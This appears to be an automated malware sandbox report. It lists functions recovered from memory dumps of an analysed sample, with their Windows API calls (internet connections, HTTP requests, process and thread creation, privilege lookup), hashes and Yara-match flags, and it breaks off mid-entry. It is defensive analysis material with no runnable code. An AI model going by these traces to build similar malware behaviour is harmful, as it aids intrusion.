                            Uniqueness Score: -1.00%

                            Function 053696E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000010.00000002.510146326.0000000005300000.00000040.00000001.sdmp, Offset: 05300000, based on PE: true
                            • Associated: 00000010.00000002.510915054.000000000541B000.00000040.00000001.sdmp Download File
                            • Associated: 00000010.00000002.510936884.000000000541F000.00000040.00000001.sdmp Download File
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 577007abd275dda7ef7e2fc43dd36984f86a9fe5884b161f5d4d06960397dc52
                            • Instruction ID: 12bbd645570a0425921c6e1963e287bfb76b67b02460ea333ee97cac4b172bf0
                            • Opcode Fuzzy Hash: 577007abd275dda7ef7e2fc43dd36984f86a9fe5884b161f5d4d06960397dc52
                            • Instruction Fuzzy Hash: 1E90027560108D02E1206159844474A00159BD0341F95C821A4455658DC6D988917161
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 053696D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000010.00000002.510146326.0000000005300000.00000040.00000001.sdmp, Offset: 05300000, based on PE: true
                            • Associated: 00000010.00000002.510915054.000000000541B000.00000040.00000001.sdmp Download File
                            • Associated: 00000010.00000002.510936884.000000000541F000.00000040.00000001.sdmp Download File
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 142aa4790375ec5491b0bc35b788e3cd86f5a433614d0cb8459831045bc6eb06
                            • Instruction ID: 86f2788e4d915f3959e889f518acd55490897008c1de89119991699b7d93728e
                            • Opcode Fuzzy Hash: 142aa4790375ec5491b0bc35b788e3cd86f5a433614d0cb8459831045bc6eb06
                            • Instruction Fuzzy Hash: B690027560100D42E11061594444B4600159BE0341F91C426A0155654DC659C8517561
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 05369910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000010.00000002.510146326.0000000005300000.00000040.00000001.sdmp, Offset: 05300000, based on PE: true
                            • Associated: 00000010.00000002.510915054.000000000541B000.00000040.00000001.sdmp Download File
                            • Associated: 00000010.00000002.510936884.000000000541F000.00000040.00000001.sdmp Download File
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 227ec0977c82ffec485c59c73c311d1eeae6f0906625c67bf9a5ac09b8911740
                            • Instruction ID: ac4cae72ab36ea8fc215af221c75643def396b655e4e5e8c446ef90016f85b21
                            • Opcode Fuzzy Hash: 227ec0977c82ffec485c59c73c311d1eeae6f0906625c67bf9a5ac09b8911740
                            • Instruction Fuzzy Hash: A49002B560100902E1507159444474600159BD0341F91C421A5095554EC69D8DD576A5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 053699A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000010.00000002.510146326.0000000005300000.00000040.00000001.sdmp, Offset: 05300000, based on PE: true
                            • Associated: 00000010.00000002.510915054.000000000541B000.00000040.00000001.sdmp Download File
                            • Associated: 00000010.00000002.510936884.000000000541F000.00000040.00000001.sdmp Download File
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: e9f94f7b310953612f4c37e0978f94f3692aecbe067289f0b06852a9e10e7d04
                            • Instruction ID: 6c05bce933a96b7ab7152d16a915da16e99df3d7ec7d87526f1a223e4dd0788b
                            • Opcode Fuzzy Hash: e9f94f7b310953612f4c37e0978f94f3692aecbe067289f0b06852a9e10e7d04
                            • Instruction Fuzzy Hash: BE9002A574100942E11061594454B060015DBE1341F91C425E1095554DC65DCC527166
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 05369860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000010.00000002.510146326.0000000005300000.00000040.00000001.sdmp, Offset: 05300000, based on PE: true
                            • Associated: 00000010.00000002.510915054.000000000541B000.00000040.00000001.sdmp Download File
                            • Associated: 00000010.00000002.510936884.000000000541F000.00000040.00000001.sdmp Download File
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 9883d56e457e7f8de916c1058d751b84f07b02006bea709a39a422c13f2a30bd
                            • Instruction ID: 3b5b2bd39322067f137eee38022e2988c0bfad4fa27c38326435b8fd87d8866a
                            • Opcode Fuzzy Hash: 9883d56e457e7f8de916c1058d751b84f07b02006bea709a39a422c13f2a30bd
                            • Instruction Fuzzy Hash: A490027560100913E1216159454470700199BD0281FD1C822A0455558DD69A8952B161
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 05369840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000010.00000002.510146326.0000000005300000.00000040.00000001.sdmp, Offset: 05300000, based on PE: true
                            • Associated: 00000010.00000002.510915054.000000000541B000.00000040.00000001.sdmp Download File
                            • Associated: 00000010.00000002.510936884.000000000541F000.00000040.00000001.sdmp Download File
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 69103050556ad365710e786dff40cc77a37c0ea4f145d5f4f77ca6d451f21779
                            • Instruction ID: 6d59f68536e10d777ca80202a9501a485d73aa80343bc57ba0c5a4141e9f8475
                            • Opcode Fuzzy Hash: 69103050556ad365710e786dff40cc77a37c0ea4f145d5f4f77ca6d451f21779
                            • Instruction Fuzzy Hash: 34900265642046526555B15944445074016ABE02817D1C422A1445950CC56A9856E661
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 05369A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000010.00000002.510146326.0000000005300000.00000040.00000001.sdmp, Offset: 05300000, based on PE: true
                            • Associated: 00000010.00000002.510915054.000000000541B000.00000040.00000001.sdmp Download File
                            • Associated: 00000010.00000002.510936884.000000000541F000.00000040.00000001.sdmp Download File
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: a4d437fcff8c1f4df397567711c8b03ffb5b532078fff699371638dd889611a5
                            • Instruction ID: 4364e41accb385847584d35751212cf37ce7ee6e79ae9c6203a53c799fc4f784
                            • Opcode Fuzzy Hash: a4d437fcff8c1f4df397567711c8b03ffb5b532078fff699371638dd889611a5
                            • Instruction Fuzzy Hash: FF90026561180542E21065694C54B0700159BD0343F91C525A0185554CC95988616561
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00DD89CB, Relevance: 28.1, APIs: 1, Strings: 15, Instructions: 65networkCOMMON
                            Download Yara Rule
                            APIs
                            • HttpSendRequestA.WININET(RequestA,SendRequestA,HttpSendRequestA,00000000,?,?,?,?,00000000), ref: 00DD89BC
                            Strings
                            Memory Dump Source
                            • Source File: 00000010.00000002.505826920.0000000000DC0000.00000040.00020000.sdmp, Offset: 00DC0000, based on PE: false
                            Yara matches
                            Similarity
                            • API ID: HttpRequestSend
                            • String ID: File$File$Http$HttpSendRequestA$Inte$InternetReadFile$Read$ReadFile$Requ$RequestA$Send$SendRequestA$estA$rnet$rnetReadFile
                            • API String ID: 360639707-3959710056
                            • Opcode ID: d5b9094f3cd13e19344bbfae1e4d624f5dccb206b88a28427ad4141f0228c73c
                            • Instruction ID: 85ef51703f22aacf6cfa7e57d9b2b8f905fcdf3806819325ecac736879f0fec3
                            • Opcode Fuzzy Hash: d5b9094f3cd13e19344bbfae1e4d624f5dccb206b88a28427ad4141f0228c73c
                            • Instruction Fuzzy Hash: 342115B1905259AFCB11DF98D941AAEBBB8EF54210F148189F9586B305D6709A10CBF2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00DD8855, Relevance: 19.3, APIs: 2, Strings: 9, Instructions: 63networkCOMMON
                            Download Yara Rule
                            APIs
                            • InternetOpenA.WININET(rnetOpenA,InternetOpenA,?,?,?), ref: 00DD8847
                            • InternetConnectA.WININET(ConnectA,rnetConnectA,InternetConnectA,00000000,?,?,?,?,?,?,?,00000000), ref: 00DD88C8
                            Strings
                            Memory Dump Source
                            • Source File: 00000010.00000002.505826920.0000000000DC0000.00000040.00020000.sdmp, Offset: 00DC0000, based on PE: false
                            Yara matches
                            Similarity
                            • API ID: Internet$ConnectOpen
                            • String ID: Conn$ConnectA$Inte$InternetConnectA$InternetOpenA$ectA$rnet$rnetConnectA$rnetOpenA
                            • API String ID: 2790792615-445249611
                            • Opcode ID: 5fa68437addde2100cd29ac2d77750387b3ecb218cf6a2da5d17c425dedf5792
                            • Instruction ID: d419df915fb654c619440319bdaff7bc1566b0478d7171c8f3dd1552bbe53dd4
                            • Opcode Fuzzy Hash: 5fa68437addde2100cd29ac2d77750387b3ecb218cf6a2da5d17c425dedf5792
                            • Instruction Fuzzy Hash: CA11DAB2905119AFDB15DF98D940EEF77B9EB48310F098249BE09A7304C630EE10CBE1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00DD88E0, Relevance: 15.8, APIs: 1, Strings: 8, Instructions: 48networkCOMMON
                            Download Yara Rule
                            APIs
                            • HttpOpenRequestA.WININET(RequestA,OpenRequestA,HttpOpenRequestA,00000000,?,?,?,?,?,?,?,00000000), ref: 00DD8948
                            Strings
                            Memory Dump Source
                            • Source File: 00000010.00000002.505826920.0000000000DC0000.00000040.00020000.sdmp, Offset: 00DC0000, based on PE: false
                            Yara matches
                            Similarity
                            • API ID: HttpOpenRequest
                            • String ID: Http$HttpOpenRequestA$HttpOpenRequestA$Open$OpenRequestA$Requ$RequestA$estA
                            • API String ID: 1984915467-4016285707
                            • Opcode ID: 6c1eafa3af226a689b846ded80bf8f0a7dd1c2f620c7b46790f01cf217bfb4e9
                            • Instruction ID: aa5642c2f3ffb6deedae45df320e79e0fa4639595f4741f61f2e7dd69e194399
                            • Opcode Fuzzy Hash: 6c1eafa3af226a689b846ded80bf8f0a7dd1c2f620c7b46790f01cf217bfb4e9
                            • Instruction Fuzzy Hash: BB01D7B2905119ABCB04DF98D841DEF7BB9EB88210F158289FD48A7305D631AD108BE1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00DD88D7, Relevance: 15.8, APIs: 1, Strings: 8, Instructions: 47networkCOMMON
                            Download Yara Rule
                            APIs
                            • HttpOpenRequestA.WININET(RequestA,OpenRequestA,HttpOpenRequestA,00000000,?,?,?,?,?,?,?,00000000), ref: 00DD8948
                            Strings
                            Memory Dump Source
                            • Source File: 00000010.00000002.505826920.0000000000DC0000.00000040.00020000.sdmp, Offset: 00DC0000, based on PE: false
                            Yara matches
                            Similarity
                            • API ID: HttpOpenRequest
                            • String ID: Http$HttpOpenRequestA$HttpOpenRequestA$Open$OpenRequestA$Requ$RequestA$estA
                            • API String ID: 1984915467-4016285707
                            • Opcode ID: d69986c03cd36b082513b492e9fc0b569e989368efabb8b66ec8b3518b36aab6
                            • Instruction ID: d42e92186736cbd474520db6913f47f1115adf34ead691fdcb48f398c6d88422
                            • Opcode Fuzzy Hash: d69986c03cd36b082513b492e9fc0b569e989368efabb8b66ec8b3518b36aab6
                            • Instruction Fuzzy Hash: FB011BB2905149AFCB04DF98C945DEFBBB9FF49310F198299FD58A7205D630AA10CFA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00DD8960, Relevance: 15.8, APIs: 1, Strings: 8, Instructions: 42networkCOMMON
                            Download Yara Rule
                            APIs
                            • HttpSendRequestA.WININET(RequestA,SendRequestA,HttpSendRequestA,00000000,?,?,?,?,00000000), ref: 00DD89BC
                            Strings
                            Memory Dump Source
                            • Source File: 00000010.00000002.505826920.0000000000DC0000.00000040.00020000.sdmp, Offset: 00DC0000, based on PE: false
                            Yara matches
                            Similarity
                            • API ID: HttpRequestSend
                            • String ID: Http$HttpSendRequestA$HttpSendRequestA$Requ$RequestA$Send$SendRequestA$estA
                            • API String ID: 360639707-2503632690
                            • Opcode ID: 177ccb57ee224b759035b8d17f1308ad0ebf8aeb9cb95bc6b42b40d67c27329b
                            • Instruction ID: 8665552831c76ad518525c79a85c3a92c09736c3cf76a7ceaadc226282e37767
                            • Opcode Fuzzy Hash: 177ccb57ee224b759035b8d17f1308ad0ebf8aeb9cb95bc6b42b40d67c27329b
                            • Instruction Fuzzy Hash: 7F014BB2905118AFCB00DF98D841ABFBBB8EB48210F148189FD18A7304D671EE10CBF2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00DD8956, Relevance: 15.8, APIs: 1, Strings: 8, Instructions: 40networkCOMMON
                            Download Yara Rule
                            APIs
                            • HttpSendRequestA.WININET(RequestA,SendRequestA,HttpSendRequestA,00000000,?,?,?,?,00000000), ref: 00DD89BC
                            Strings
                            Memory Dump Source
                            • Source File: 00000010.00000002.505826920.0000000000DC0000.00000040.00020000.sdmp, Offset: 00DC0000, based on PE: false
                            Yara matches
                            Similarity
                            • API ID: HttpRequestSend
                            • String ID: Http$HttpSendRequestA$HttpSendRequestA$Requ$RequestA$Send$SendRequestA$estA
                            • API String ID: 360639707-2503632690
                            • Opcode ID: ae5b6745cc4f281a6e66eb45ae294286b5dfbd40b9538ef0a0963598aac513f8
                            • Instruction ID: 45a7a9d1055cd5ac158a98129686177d918e0d0ec6585263dcdc8151c286399b
                            • Opcode Fuzzy Hash: ae5b6745cc4f281a6e66eb45ae294286b5dfbd40b9538ef0a0963598aac513f8
                            • Instruction Fuzzy Hash: CF0128B2905259ABCB15CF98C881AEFBBB8EF58210F148189FD59A7305C7719A10CFA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00DD8860, Relevance: 14.0, APIs: 1, Strings: 7, Instructions: 48networkCOMMON
                            Download Yara Rule
                            APIs
                            • InternetConnectA.WININET(ConnectA,rnetConnectA,InternetConnectA,00000000,?,?,?,?,?,?,?,00000000), ref: 00DD88C8
                            Strings
                            Memory Dump Source
                            • Source File: 00000010.00000002.505826920.0000000000DC0000.00000040.00020000.sdmp, Offset: 00DC0000, based on PE: false
                            Yara matches
                            Similarity
                            • API ID: ConnectInternet
                            • String ID: Conn$ConnectA$Inte$InternetConnectA$ectA$rnet$rnetConnectA
                            • API String ID: 3050416762-1024195942
                            • Opcode ID: 7ed34138f7708cf7613383558ca86b8bd00d3c79a0a04dd4c06582688efb1e76
                            • Instruction ID: 4806d1cca4afcaeac6acf689a6f8bc1d898d7fd72c9305c9fd2fcfcf4473246b
                            • Opcode Fuzzy Hash: 7ed34138f7708cf7613383558ca86b8bd00d3c79a0a04dd4c06582688efb1e76
                            • Instruction Fuzzy Hash: 8F01E9B2905118AFCB14DF99D941EEF77B9EB48310F158289FE08A7241D670EE10CBE1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00DD87F0, Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 41networkCOMMON
                            Download Yara Rule
                            APIs
                            • InternetOpenA.WININET(rnetOpenA,InternetOpenA,?,?,?), ref: 00DD8847
                            Strings
                            Memory Dump Source
                            • Source File: 00000010.00000002.505826920.0000000000DC0000.00000040.00020000.sdmp, Offset: 00DC0000, based on PE: false
                            Yara matches
                            Similarity
                            • API ID: InternetOpen
                            • String ID: A$Inte$InternetOpenA$Open$rnet$rnetOpenA
                            • API String ID: 2038078732-3155091674
                            • Opcode ID: 883d24814d1d434d2a1ce25732a84b13edda96a210da1abb7f18c8cad43de92b
                            • Instruction ID: 88aeec23976d88fedb83c203e3b59336e705a711cfb3196bbdf365206c764f92
                            • Opcode Fuzzy Hash: 883d24814d1d434d2a1ce25732a84b13edda96a210da1abb7f18c8cad43de92b
                            • Instruction Fuzzy Hash: C3F019B2901218AF8B14DF98DC419EBB7BDEF48310B04858AFE18A7301D631AE108BE1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00DD87E9, Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 40networkCOMMON
                            Download Yara Rule
                            APIs
                            • InternetOpenA.WININET(rnetOpenA,InternetOpenA,?,?,?), ref: 00DD8847
                            Strings
                            Memory Dump Source
                            • Source File: 00000010.00000002.505826920.0000000000DC0000.00000040.00020000.sdmp, Offset: 00DC0000, based on PE: false
                            Yara matches
                            Similarity
                            • API ID: InternetOpen
                            • String ID: A$Inte$InternetOpenA$Open$rnet$rnetOpenA
                            • API String ID: 2038078732-3155091674
                            • Opcode ID: c6843bea4c933d7574f54c9f46ec2b89ade053ec92b2d772f0569c440019f87d
                            • Instruction ID: 2213d1fe67d0d388edafc0b372487e762da4b084f77efc7ffc6b12441fd55418
                            • Opcode Fuzzy Hash: c6843bea4c933d7574f54c9f46ec2b89ade053ec92b2d772f0569c440019f87d
                            • Instruction Fuzzy Hash: 4C014BB2901118AF8B14DFA8DC45DEF7B79EF48310B148549FE18AB241D730AA10CBE0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00DD6EF0, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON
                            Download Yara Rule
                            APIs
                            • Sleep.KERNELBASE(000007D0), ref: 00DD6F98
                            Strings
                            Memory Dump Source
                            • Source File: 00000010.00000002.505826920.0000000000DC0000.00000040.00020000.sdmp, Offset: 00DC0000, based on PE: false
                            Yara matches
                            Similarity
                            • API ID: Sleep
                            • String ID: net.dll$wininet.dll
                            • API String ID: 3472027048-1269752229
                            • Opcode ID: 9af03f7d8b8f3cb13721ec944da4d2b0e0be474876f60c5ffa2889f2ab7990b6
                            • Instruction ID: 17f6f81fa4732adbcd1ff6b744ae0be5f458fa112641660e3408ead4adf75f7b
                            • Opcode Fuzzy Hash: 9af03f7d8b8f3cb13721ec944da4d2b0e0be474876f60c5ffa2889f2ab7990b6
                            • Instruction Fuzzy Hash: 03314BB5601704ABC711DF68D8A1FA7B7B8EB48700F04851EF65AAB241D770B545CBF1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00DD6EE6, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 85sleepCOMMON
                            Download Yara Rule
                            APIs
                            • Sleep.KERNELBASE(000007D0), ref: 00DD6F98
                            Strings
                            Memory Dump Source
                            • Source File: 00000010.00000002.505826920.0000000000DC0000.00000040.00020000.sdmp, Offset: 00DC0000, based on PE: false
                            Yara matches
                            Similarity
                            • API ID: Sleep
                            • String ID: net.dll$wininet.dll
                            • API String ID: 3472027048-1269752229
                            • Opcode ID: 4c2a2ae1352936985be66b812d468caf95c2973c95d3259674e338bb2d96b5bf
                            • Instruction ID: 3a108483d484fd1c2b9d85b9e4fb874bcf7d21f6921f294beaa0a88377c787ee
                            • Opcode Fuzzy Hash: 4c2a2ae1352936985be66b812d468caf95c2973c95d3259674e338bb2d96b5bf
                            • Instruction Fuzzy Hash: 5F31CBB1605700ABD711DF68D8A1FAAB7B4EF88700F04802EF6596B281D370E945CBF5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00DD84E0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                            Download Yara Rule
                            APIs
                            • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00DC3B93), ref: 00DD850D
                            Strings
                            Memory Dump Source
                            • Source File: 00000010.00000002.505826920.0000000000DC0000.00000040.00020000.sdmp, Offset: 00DC0000, based on PE: false
                            Yara matches
                            Similarity
                            • API ID: FreeHeap
                            • String ID: .z`
                            • API String ID: 3298025750-1441809116
                            • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                            • Instruction ID: 3b0b6b685a1d9fe111a0da1115a08aebb9282e2253847e98672abd93a325ed38
                            • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                            • Instruction Fuzzy Hash: 01E01AB12002086BD714DF59CC45EA777ADEF88750F014555B90857281C630E9108AB0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00DD84D9, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 21memoryCOMMON
                            Download Yara Rule
                            APIs
                            • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00DC3B93), ref: 00DD850D
                            Strings
                            Memory Dump Source
                            • Source File: 00000010.00000002.505826920.0000000000DC0000.00000040.00020000.sdmp, Offset: 00DC0000, based on PE: false
                            Yara matches
                            Similarity
                            • API ID: FreeHeap
                            • String ID: .z`
                            • API String ID: 3298025750-1441809116
                            • Opcode ID: 3ee11049d7c722ac33d182c222a893c0e6ee9b89d82a775565a4bd53ecf47ba5
                            • Instruction ID: 3d21a94fb8f3569763eff857727a73fc2e6dfbccdf20da2ad83d389391b1ab5d
                            • Opcode Fuzzy Hash: 3ee11049d7c722ac33d182c222a893c0e6ee9b89d82a775565a4bd53ecf47ba5
                            • Instruction Fuzzy Hash: CFE026B41002845FDB10EF58D8C08AB7795EF803147108A4AEC6847606C131D86A8BB1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00DC7270, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                            Download Yara Rule
                            APIs
                            • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 00DC72CA
                            • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 00DC72EB
                            Memory Dump Source
                            • Source File: 00000010.00000002.505826920.0000000000DC0000.00000040.00020000.sdmp, Offset: 00DC0000, based on PE: false
                            Yara matches
                            Similarity
                            • API ID: MessagePostThread
                            • String ID:
                            • API String ID: 1836367815-0
                            • Opcode ID: 49ab76c00c9184220b9dbad1f4bc5ba5386cd827cddda64d51339b7d16c96ff1
                            • Instruction ID: b20c9d37344602dc62bf0c899b1b5b06bbaa7bf7720def82303b7792a3a82614
                            • Opcode Fuzzy Hash: 49ab76c00c9184220b9dbad1f4bc5ba5386cd827cddda64d51339b7d16c96ff1
                            • Instruction Fuzzy Hash: E601D631A8022977E720A6949C43FFEB76C9F00F51F154119FF04BB2C1E6956A0687FA
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00DD8632, Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                            Download Yara Rule
                            APIs
                            • LookupPrivilegeValueW.ADVAPI32(00000000,?,00DCCFB2,00DCCFB2,?,00000000,?,?), ref: 00DD8670
                            Memory Dump Source
                            • Source File: 00000010.00000002.505826920.0000000000DC0000.00000040.00020000.sdmp, Offset: 00DC0000, based on PE: false
                            Yara matches
                            Similarity
                            • API ID: LookupPrivilegeValue
                            • String ID:
                            • API String ID: 3899507212-0
                            • Opcode ID: a8f0a5179ec3918f5198ae276a2bbff7539f31db9dc2293bf26dbcbc8b3ebc53
                            • Instruction ID: 34418f99c4cfe726ab8f38a7cfc4447734d5158078a24d1e81bf42e626a9af1d
                            • Opcode Fuzzy Hash: a8f0a5179ec3918f5198ae276a2bbff7539f31db9dc2293bf26dbcbc8b3ebc53
                            • Instruction Fuzzy Hash: 3001F9B52441442BD714DF95AC81DE77B98EF89660F04865EFD8D47243C830E405CB70
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00DC9B30, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                            Download Yara Rule
                            APIs
                            • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00DC9BA2
                            Memory Dump Source
                            • Source File: 00000010.00000002.505826920.0000000000DC0000.00000040.00020000.sdmp, Offset: 00DC0000, based on PE: false
                            Yara matches
                            Similarity
                            • API ID: Load
                            • String ID:
                            • API String ID: 2234796835-0
                            • Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                            • Instruction ID: 05ab19acbbdc3ef02abb6a0463b702aff7bf9393a613def8f94581b90f67f230
                            • Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                            • Instruction Fuzzy Hash: 190152B5D4010DB7DB10DBA4DC82F9DB7799B54308F048195E90897241F631EB14CBB1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00DD854D, Relevance: 1.5, APIs: 1, Instructions: 43processCOMMON
                            Download Yara Rule
                            APIs
                            • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00DD85A4
                            Memory Dump Source
                            • Source File: 00000010.00000002.505826920.0000000000DC0000.00000040.00020000.sdmp, Offset: 00DC0000, based on PE: false
                            Yara matches
                            Similarity
                            • API ID: CreateInternalProcess
                            • String ID:
                            • API String ID: 2186235152-0
                            • Opcode ID: d902da6637b82bd58c1b708efd1ca5fc13f1900c967f613af57d143c082cb42b
                            • Instruction ID: cc369e40eb514621ee3f1f6e5e43e50c9110a6409a626f1b654ebafb55559028
                            • Opcode Fuzzy Hash: d902da6637b82bd58c1b708efd1ca5fc13f1900c967f613af57d143c082cb42b
                            • Instruction Fuzzy Hash: 9E01A4B2200508BFCB54CF99DC80EEB77A9AF8C354F158258FA0DE7241C630E851CBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00DD8550, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                            Download Yara Rule
                            APIs
                            • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00DD85A4
                            Memory Dump Source
                            • Source File: 00000010.00000002.505826920.0000000000DC0000.00000040.00020000.sdmp, Offset: 00DC0000, based on PE: false
                            Yara matches
                            Similarity
                            • API ID: CreateInternalProcess
                            • String ID:
                            • API String ID: 2186235152-0
                            • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                            • Instruction ID: 4b6145bd626def5eef194570bbe6430c3f8d3af10571934c54a7a5daa41ea169
                            • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                            • Instruction Fuzzy Hash: D9015FB2214208AFCB54DF89DC81EEB77ADAF8C754F158258BA0D97251D630E851CBA4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00DD7020, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                            Download Yara Rule
                            APIs
                            • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,00DCCCE0,?,?), ref: 00DD705C
                            Memory Dump Source
                            • Source File: 00000010.00000002.505826920.0000000000DC0000.00000040.00020000.sdmp, Offset: 00DC0000, based on PE: false
                            Yara matches
                            Similarity
                            • API ID: CreateThread
                            • String ID:
                            • API String ID: 2422867632-0
                            • Opcode ID: 5670447c734d626b77e30e202337d5e73e6b02cff39b60b41192f5a46965ff24
                            • Instruction ID: 36a95d08162fdaa226b9acdb9e427db87c161c26797cb9de0a36817c5df4b9e1
                            • Opcode Fuzzy Hash: 5670447c734d626b77e30e202337d5e73e6b02cff39b60b41192f5a46965ff24
                            • Instruction Fuzzy Hash: 7FE06D333803043AE6306599AC03FA7B39CDB81B20F140026FA0DEA2C1D595F90142B5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00DD7013, Relevance: 1.5, APIs: 1, Instructions: 34threadCOMMON
                            Download Yara Rule
                            APIs
                            • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,00DCCCE0,?,?), ref: 00DD705C
                            Memory Dump Source
                            • Source File: 00000010.00000002.505826920.0000000000DC0000.00000040.00020000.sdmp, Offset: 00DC0000, based on PE: false
                            Yara matches
                            Similarity
                            • API ID: CreateThread
                            • String ID:
                            • API String ID: 2422867632-0
                            • Opcode ID: 42603fc3f350f7515e5542f802e97f7819b562266e6d671bb701b52b44e98a52
                            • Instruction ID: 988384f8ff316c359c982a8aa22a9975c11ee45006892e2518d28ca3327c94a6
                            • Opcode Fuzzy Hash: 42603fc3f350f7515e5542f802e97f7819b562266e6d671bb701b52b44e98a52
                            • Instruction Fuzzy Hash: 3BF0E5722813003BD73026A88C03FAB7768DF85B20F180055FA48AB3C2D5A0F90187F5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00DD8513, Relevance: 1.5, APIs: 1, Instructions: 29processCOMMON
                            Download Yara Rule
                            APIs
                            • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00DD85A4
                            Memory Dump Source
                            • Source File: 00000010.00000002.505826920.0000000000DC0000.00000040.00020000.sdmp, Offset: 00DC0000, based on PE: false
                            Yara matches
                            Similarity
                            • API ID: CreateInternalProcess
                            • String ID:
                            • API String ID: 2186235152-0
                            • Opcode ID: 957f80a45fe485658e22986490e018f08d9bfacf2aa6e57de0e44f510a002bdb
                            • Instruction ID: fc65ea6097c651a49e1c1557193e4d80763ffa82d16581cf9fc4f9c4d7c06c5e
                            • Opcode Fuzzy Hash: 957f80a45fe485658e22986490e018f08d9bfacf2aa6e57de0e44f510a002bdb
                            • Instruction Fuzzy Hash: 68E0C9B2214419AF8B04CF98E890CEB73EDEB8C754B008208FA1CC3200C630E8218B60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00DD84A0, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                            Download Yara Rule
                            APIs
